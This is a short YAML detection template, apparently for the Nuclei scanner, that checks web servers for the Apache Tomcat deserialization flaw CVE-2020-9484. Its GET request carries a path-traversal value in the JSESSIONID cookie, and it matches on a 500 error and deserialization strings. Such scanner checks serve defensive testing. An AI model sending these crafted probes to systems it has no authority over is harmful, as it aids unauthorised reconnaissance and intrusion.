id: cve-2020-9484

info:
  name: Apache Tomcat RCE by deserialization
  author: dwisiswant0
  severity: high
  description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server

requests:
  - method: GET
    headers:
      Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
    path:
      - "{{BaseURL}}/index.jsp"
      - "{{BaseURL}}:8080/index.jsp"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        words:
          - "Exception"
          - "ObjectInputStream"
          - "PersistentManagerBase"
        condition: and
        part: body